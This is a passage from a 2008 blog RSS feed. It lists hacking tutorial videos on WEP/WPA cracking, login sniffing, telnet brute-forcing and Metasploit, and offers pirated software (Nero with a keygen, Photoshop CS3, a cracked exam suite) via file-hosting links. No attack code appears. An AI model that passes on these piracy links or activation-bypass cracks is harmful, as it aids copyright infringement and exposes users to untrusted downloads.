<a href="http://rapidshare.com/files/31514447/hv32.rar" target="_blank">http://rapidshare.com/files/31514447/hv32.rar</a></p>
<p>Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf<br />
<a href="http://rapidshare.com/files/31514918/hv33.rar" target="_blank">http://rapidshare.com/files/31514918/hv33.rar</a></p>
<p>MAC Bridging with Windows XP and Sniffing!.swf<br />
<a href="http://rapidshare.com/files/31515325/hv34.rar" target="_blank">http://rapidshare.com/files/31515325/hv34.rar</a></p>
<p>Mass De-Authentication using void11 (Auditor).swf<br />
<a href="http://rapidshare.com/files/31516717/hv35.rar" target="_blank">http://rapidshare.com/files/31516717/hv35.rar</a></p>
<p>Metasploit Flash Tutorial!.swf<br />
<a href="http://rapidshare.com/files/31516967/hv36.rar" target="_blank">http://rapidshare.com/files/31516967/hv36.rar</a></p>
<p>MITM Hijacking.wmv<br />
<a href="http://rapidshare.com/files/31519959/hv37.rar" target="_blank">http://rapidshare.com/files/31519959/hv37.rar</a></p>
<p>Nmap Video Tutorial 2 Port Scan Boogaloo!.swf<br />
<a href="http://rapidshare.com/files/31522321/hv38.rar" target="_blank">http://rapidshare.com/files/31522321/hv38.rar</a></p>
<p>Sniffing logins and passwords.avi<br />
<a href="http://rapidshare.com/files/31522322/hv39.rar" target="_blank">http://rapidshare.com/files/31522322/hv39.rar</a></p>
<p>Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi<br />
<a href="http://rapidshare.com/files/31526967/hv41.rar" target="_blank">http://rapidshare.com/files/31526967/hv41.rar</a></p>
<p>Sniffing VoIP Using Cain!.swf<br />
<a href="http://rapidshare.com/files/31529820/hv42.rar" target="_blank">http://rapidshare.com/files/31529820/hv42.rar</a></p>
<p>Snort Instruction video &#8211; howto install into backtrack.swf<br />
<a href="http://rapidshare.com/files/31529822/hv43.rar" target="_blank">http://rapidshare.com/files/31529822/hv43.rar</a></p>
<p>SSH Dynamic Port Forwarding!.swf<br />
<a href="http://rapidshare.com/files/31529823/hv44.rar" target="_blank">http://rapidshare.com/files/31529823/hv44.rar</a></p>
<p>Start a session and get interactive commandline access to a remote Windows box!.avi<br />
<a href="http://rapidshare.com/files/31529824/hv45.rar" target="_blank">http://rapidshare.com/files/31529824/hv45.rar</a></p>
<p>Telnet Bruteforce.avi<br />
<a href="http://rapidshare.com/files/31529825/hv46.rar" target="_blank">http://rapidshare.com/files/31529825/hv46.rar</a></p>
<p>Tunneling Exploits through SSH.avi<br />
<a href="http://rapidshare.com/files/31529826/hv47.rar" target="_blank">http://rapidshare.com/files/31529826/hv47.rar</a></p>
<p>Use Brutus to crack a box running telnet!.avi<br />
<a href="http://rapidshare.com/files/31530857/hv48.rar" target="_blank">http://rapidshare.com/files/31530857/hv48.rar</a></p>
<p>Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf<br />
<a href="http://rapidshare.com/files/31530858/hv49.rar" target="_blank">http://rapidshare.com/files/31530858/hv49.rar</a></p>
<p>WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf<br />
<a href="http://rapidshare.com/files/31530859/hv50.rar" target="_blank">http://rapidshare.com/files/31530859/hv50.rar</a></p>
<p>WMF File Code Execution Vulnerability With Metasploit!.swf<br />
<a href="http://rapidshare.com/files/31530860/hv51.rar" target="_blank">http://rapidshare.com/files/31530860/hv51.rar</a></p>
<p>WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf<br />
<a href="http://rapidshare.com/files/31530861/hv52.rar" target="_blank">http://rapidshare.com/files/31530861/hv52.rar</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=13&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Nero 8 Ultra Edition 8.2.8.0 (Incl 100% Working Keygen)</title>
		<link>http://redglue.wordpress.com/2008/05/09/nero-8-ultra-edition-8280-incl-100-working-keygen/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/nero-8-ultra-edition-8280-incl-100-working-keygen/#comments</comments>
		<pubDate>Fri, 09 May 2008 00:56:42 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=12</guid>
		<description><![CDATA[Nero 8 &#8211; The Ultimate solution for Data, Video, Photo, Audio and BackUp!
Nero 8 is a software solution that brings the digital world to your PC with features that make it fun and easy to create multimedia projects with high-quality, professional results. Create MP3 mixes and edit vacation videos in High Definition format. Share content [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=12&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Nero 8 &#8211; The Ultimate solution for Data, Video, Photo, Audio and BackUp!<br />
Nero 8 is a software solution that brings the digital world to your PC with features that make it fun and easy to create multimedia projects with high-quality, professional results. Create MP3 mixes and edit vacation videos in High Definition format. Share content around the world with simple Internet upload functions. Burn a disc with just one click, and then enjoy it in any room in your house with versatile streaming features. Rest easy knowing your data is safe in the event of a system crash or a damaged disc. Nero 8 lets you live the digital life with cutting-edge technology and world-class features.</p>
<p>Nero 8, the newest version of the world’s best-selling multimedia suite, brings the digital world to your PC. Now it’s easy to organize and manage all your multimedia files, as well as create and edit new digital content. Nero’s sleek design and user-friendly tools make completing projects fun and enjoyable.</p>
<p>Nero StartSmart 8 is the entry point for all functionality in Nero 8. With Nero StartSmart 8, all the powerful features of Nero8 are at your fingertips, making it easier than ever to complete your digital tasks.</p>
<p>Nero 8 comes loaded with a number of features that enhance Windows VistaTM. With the Nero DiscCopy Gadget, you can copy a disc of any format with just one click. With Rich Preview, you can view the contents of your files without having to open a separate application. With Nero MCE Plug-ins, you can burn and stream your content on a Windows Vista™ MCE powered machine.</p>
<p>New and Improved Features in Nero 8 :<br />
* Direct access to all features from the project launcher<br />
* High Definition format support<br />
* Xbox 360™ and PlayStation® 3 streaming features<br />
* Blu-ray Disc and HD DVD burning support<br />
* SecurDisc data protection support<br />
* Copy a disc with just one click<br />
* Graphics optimized for Windows Vista™<br />
* Continual free updates</p>
<p>Nero StartSmart makes creating projects fun and simple<br />
Nero StartSmart, the project launcher for Nero 8, lets you directly access features and perform one-click functions. The intuitive interface makes creating and managing digital projects easy and enjoyable. Optimized for use with Windows Vista™, Nero StartSmart even has an integrated newsfeed system.</p>
<p>Nero 8 is the solution for your multimedia projects<br />
Nero 8 has the tools to help you handle all your multimedia projects. Whether you plan to create a music mix with MP3 files, edit vacation videos, touch up digital photos, make a slide show, or convert content to play on a mobile device, your results will be professional and dynamic.</p>
<p>Nero 8 takes home entertainment around the house<br />
Organize and manage all your multimedia files with Nero’s home media center. Nero 8 lets you use your Xbox 360™ or PlayStation® 3 to stream High Definition video content and surround sound audio files to enjoy in the comfort of any room in your house.</p>
<p>Nero 8 offers increased data security<br />
No more worries over losing data! Nero 8 has back up features that let you rest easy knowing your data is safe in case of a complete system crash or a damaged disc. Recover your data quickly and easily and create discs that are password protected. SecurDisc technology gives you peace of mind.</p>
<p>The following applications are included in Nero 8:<br />
• Nero Mobile – Media Center for Mobile Devices (Included in the Retail version of Nero 8 only)<br />
• Nero Home 3 – Media Management System<br />
• Nero Scout – Database Technology<br />
• Nero StartSmart 8 – One-Click Project Launcher<br />
• Nero Burning ROM 8 – Expert CD and DVD Burning<br />
• Nero Express 8 – Easy Interface CD and DVD Burning<br />
• Nero WaveEditor 4 – Audio Editing and Recording<br />
• Nero SoundTrax 3 – Professional Audio Mixing<br />
• Nero Vision 5 – Video Editing and Authoring<br />
• Nero Recode 2 – The World’s Fastest Video Converter<br />
• Nero ShowTime 4 – DVD and Multimedia Player<br />
• Nero MediaHome 3 – UPnPTM Streaming Solution<br />
• Nero ControlCenter – Simplified Customization and Configuration<br />
• Nero PhotoSnap – Photo Editing<br />
• Nero PhotoSnap Viewer – Photo Viewing<br />
• Nero CoverDesigner 3 – CD and DVD Label Design<br />
• Nero BackItUp 3 – Complete Backup Solution<br />
• Nero ImageDrive 3 – Virtual Drive Setup<br />
• Nero DiscSpeed 4 – Improve Optical Drive Performance<br />
• Nero DriveSpeed 3 – Complete Optical Drive Control<br />
• Nero RescueAgent – Improved File Recovery<br />
• Nero BurnRights – Easily Deployable Burning Rights<br />
• Nero InfoTool 5 – Drive and Disc Analysis<br />
• InCD 5 – Packet Writing Solution<br />
• SecurDisc Viewer – View SecurDisc protected files</p>
<p>Supported Platforms: Windows XP / 2000 / Vista</p>
<p>http://rapidshare.com/files/84253226/XNer0.8UltraEdi.8280.InclKeygen.part1.rar<br />
http://rapidshare.com/files/84235202/XNer0.8UltraEdi.8280.InclKeygen.part2.rar<br />
http://rapidshare.com/files/84218901/XNer0.8UltraEdi.8280.InclKeygen.part3.rar</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/12/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/12/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=12&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/nero-8-ultra-edition-8280-incl-100-working-keygen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Paint Shop Pro 9</title>
		<link>http://redglue.wordpress.com/2008/05/08/paint-shop-pro-9/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/paint-shop-pro-9/#comments</comments>
		<pubDate>Thu, 08 May 2008 23:23:48 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=11</guid>
		<description><![CDATA[












Paint Shop Pro (PSP) is a bitmap graphics editor and vector graphics editor for computers running the Microsoft Windows operating system that was originally published by Minneapolis-based Jasc Software. In October 2004, Corel Corporation purchased Jasc Software, and with it, the distribution rights to Paint Shop Pro.
Originally called simply Paint Shop, the first version, 1.0, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=11&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div class="snap_preview">
<p style="text-align:center;"><img class="aligncenter" style="width:516px;height:385px;" src="http://i181.photobucket.com/albums/x86/MsSilkyT/psp9.jpg" alt="" width="516" height="385" align="left" /></p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p>Paint Shop Pro (PSP) is a bitmap graphics editor and vector graphics editor for computers running the Microsoft Windows operating system that was originally published by Minneapolis-based Jasc Software. In October 2004, Corel Corporation purchased Jasc Software, and with it, the distribution rights to Paint Shop Pro.</p>
<p>Originally called simply Paint Shop, the first version, 1.0, was released in early 1992. Paint Shop was originally distributed as shareware and is still available at many download sites (4.12 being a popular version), newer versions are only available commercially — a key competitor is Adobe Photoshop, the commercial market leader in this category. Photoshop’s popularity is in part because Photoshop is available in an Apple Macintosh version, the platform widely used in the print publication industry, whereas Paint Shop Pro only supports Microsoft platforms.</p>
<p>Paint Shop Pro supports natively both raster and vector graphics, whereas Photoshop only supports importation of vector graphics from Adobe Illustrator without direct built-in editing tools.</p>
<p>PSP functionality can be extended by Photoshop-compatible plugins. They are listed in the ‘Effects’ menu, below the built-in effects.</p>
<p>http://rapidshare.com/files/53764875/ps9.part1.rar<br />
http://rapidshare.com/files/53768252/ps9.part2.rar</p>
</div>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/11/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/11/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=11&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/paint-shop-pro-9/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>

		<media:content url="http://i181.photobucket.com/albums/x86/MsSilkyT/psp9.jpg" medium="image" />
	</item>
		<item>
		<title>Portable PhotoShop CS3 Final</title>
		<link>http://redglue.wordpress.com/2008/05/08/portable-photoshop-cs3-final/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/portable-photoshop-cs3-final/#comments</comments>
		<pubDate>Thu, 08 May 2008 23:22:05 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=10</guid>
		<description><![CDATA[Portable PhotoShop CS3 Final
Create powerful images with the professional standard!
Adobe Photoshop &#8211; the essential software for perfecting your images, Adobe® Photoshop® CS3 now offers productivity and workflow enhancements, powerful new editing tools, and breakthrough compositing capabilities.
Adobe® Photoshop® CS3 software accelerates your path from imagination to imagery. Ideal for photographers, graphic designers, and web designers, the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=10&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Portable PhotoShop CS3 Final<br />
Create powerful images with the professional standard!<br />
Adobe Photoshop &#8211; the essential software for perfecting your images, Adobe® Photoshop® CS3 now offers productivity and workflow enhancements, powerful new editing tools, and breakthrough compositing capabilities.</p>
<p>Adobe® Photoshop® CS3 software accelerates your path from imagination to imagery. Ideal for photographers, graphic designers, and web designers, the professional standard delivers new features such as automatic layer alignment and blending that enable advanced compositing. Live filters boost the comprehensive, nondestructive editing toolset for increased flexibility. And a streamlined interface and new timesaving tools make your work flow faster.</p>
<p>Reasons to upgrade:<br />
- Smart Filters<br />
- Quick Selection and Refine Edge tools<br />
- Advanced compositing<br />
- Streamlined interface<br />
- Better raw image processing<br />
- Improved Adobe Bridge<br />
- Enhanced Vanishing Point<br />
- Enhanced 32-bit HDR support<br />
- Peak performance<br />
- Black-and-white conversion</p>
<p>Top features:<br />
• Industry-standard editing toolset. Perfect your images with industry-leading image-editing capabilities, which include enhanced color-correction and cloning and healing tools.</p>
<p>• Nondestructive editing. Take advantage of nondestructive editing capabilities, including new Smart Filters, which let you visualize different image effects, and Smart Objects, which let you scale, rotate, and warp raster and vector graphics — all without altering pixel data.</p>
<p>• Rich painting and drawing toolset. Create or modify images with a wide assortment of professional, fully customizable paint settings, artistic brushes, and drawing tools.</p>
<p>• Advanced compositing. Create more accurate composites by automatically aligning multiple Adobe® Photoshop® layers or images based on similar content. The Auto-align Layers command quickly analyzes details and moves, rotates, or warps layers to align them perfectly, and the Auto-blend Layers command blends the color and shading to create a smooth, editable result.</p>
<p>• Quick Selection and Refine Edge tools. Make selections in a snap. Loosely draw on an image area, and the Quick Selection tool automatically completes the selection for you. Then fine-tune your selections with the Refine Edge tool.</p>
<p>• Built-in efficiency. Take advantage of customized workflows and a streamlined work environment with enhanced palette management so you can focus on your images, not your software.</p>
<p>• Improved printing experience. Experience better control over print quality with color management, a larger print preview window, and more controls in one place so you can print in fewer steps. Improved printing controls, co-developed by Adobe and HP, make printing easier and more predictable and streamline setup options via integration with select printers from HP, Epson, and Canon.</p>
<p>• Faster, more flexible asset management with Adobe Bridge CS3. Organize and manage images more efficiently with Adobe Bridge CS3, which now delivers improved performance, a Filter panel for easier searching, the ability to group multiple images under a single thumbnail, the Loupe tool, offline image browsing, and more.</p>
<p>• Wide range of supported formats. Import and export a wide range of file formats, including PSD, BMP, Cineon, JPEG, JPEG2000, OpenEXR, PNG, Targa, and TIFF.</p>
<p>• Third-party solutions and resources. Take advantage of a wealth of additional resources — including software plug-ins, books, and training — from the longstanding community of expert Photoshop developers, authors, and trainers.</p>
<p>http://rapidshare.com/files/31276320/Adobe.Photoshop.CS3-Standalone</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/10/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/10/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=10&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/portable-photoshop-cs3-final/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Adobe.Photoshop.CS3.Extended.Portable.Edition.</title>
		<link>http://redglue.wordpress.com/2008/05/08/adobephotoshopcs3extendedportableedition/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/adobephotoshopcs3extendedportableedition/#comments</comments>
		<pubDate>Thu, 08 May 2008 23:19:38 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=9</guid>
		<description><![CDATA[Photoshop CS3 Extended includes all of the same features as Photoshop CS3 but adds a brand-new set of tools and capabilities for the integration of 3-D models, video and animation, and image measurement and analysis.
In CS3, Adobe did a very good job of making interface improvements without moving too far away from the familiar. Most [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=9&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Photoshop CS3 Extended includes all of the same features as Photoshop CS3 but adds a brand-new set of tools and capabilities for the integration of 3-D models, video and animation, and image measurement and analysis.</p>
<p>In CS3, Adobe did a very good job of making interface improvements without moving too far away from the familiar. Most of the new elements unique to Photoshop Extended are well integrated into the standard Photoshop and accessed from familiar tools such as the Layers panel or various menus.<br />
3-D compositing and texture editing.</p>
<p>http://rapidshare.com/files/90676449/PAPSCS3.rar</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/9/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/9/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/9/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=9&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/adobephotoshopcs3extendedportableedition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>ERD Commander 2007</title>
		<link>http://redglue.wordpress.com/2008/05/08/erd-commander-2007/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/erd-commander-2007/#comments</comments>
		<pubDate>Thu, 08 May 2008 23:14:21 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=8</guid>
		<description><![CDATA[

Troubleshoot Windows using Microsoft Diagnostics and Recovery Toolset
This tool allows you to boot from a CD into a special diagnostics environment which enables you to:
- Fix boot problems (boot.ini/Chkdsk)
- Edit the Registry offline
- Change Services/Drivers startup state
- Restore to an earlier Restore Point even if Windows fails to start in Safe-Mode
- Reset the administrator password [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=8&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div class="entry">
<div class="snap_preview">
<p>Troubleshoot Windows using Microsoft Diagnostics and Recovery Toolset</p>
<p>This tool allows you to boot from a CD into a special diagnostics environment which enables you to:</p>
<p>- Fix boot problems (boot.ini/Chkdsk)</p>
<p>- Edit the Registry offline</p>
<p>- Change Services/Drivers startup state</p>
<p>- Restore to an earlier Restore Point even if Windows fails to start in Safe-Mode</p>
<p>- Reset the administrator password (or any other account)</p>
<p>- Easily remove malware &amp; viruses while scanning the system offline</p>
<p>- Recover lost data while the system is offline (undelete files, folders or partitions)</p>
<p>The tool fully supports TCP/IP networking for sharing folders and remote troubleshooting.</p>
<p>The environment partially-supports running other Windows applications for Virus cleaning, undelete files and more. most of the applications that will work flawlessly are the one that designed to run without installation and no run-time libraries (.Net framework, etc.)<br />
http://rapidshare.com/files/91932367/erd2007.rar</p>
</div>
</div>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/8/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/8/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/8/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=8&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/erd-commander-2007/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>THE ULTIMATE CERTIFICATION PRACTISE EXAM COLLECTION</title>
		<link>http://redglue.wordpress.com/2008/05/08/the-ultimate-certification-practise-exam-collection/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/the-ultimate-certification-practise-exam-collection/#comments</comments>
		<pubDate>Thu, 08 May 2008 22:58:19 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Study]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=7</guid>
		<description><![CDATA[

Preparing for a certification exam?? This is the COMPLETE SelfTest software practice exam catalog featuring 147 CBTs from vendors
such as Mcft, Cisco, Oracle, Novel, CompTIA just to name a few.
M*cr*s*ft
Cisco
Oracle
Novel
CompTIA
Linux
Lotus
and more………..
This has been IMHO one of the more difficult series of exams to
find with a working patch/crack due to the online activation.
Full credit goes to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=7&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div class="entry">
<div class="snap_preview">
<p>Preparing for a certification exam?? This is the COMPLETE SelfTest software practice exam catalog featuring 147 CBTs from vendors<br />
such as Mcft, Cisco, Oracle, Novel, CompTIA just to name a few.</p>
<p>M*cr*s*ft<br />
Cisco<br />
Oracle<br />
Novel<br />
CompTIA<br />
Linux<br />
Lotus<br />
and more………..</p>
<p>This has been IMHO one of the more difficult series of exams to<br />
find with a working patch/crack due to the online activation.<br />
Full credit goes to some dude who goes by the alias REBEL<br />
for the patch which bypasses the online activation and fully<br />
unlocks the each exam on the CD for your enjoyment!<br />
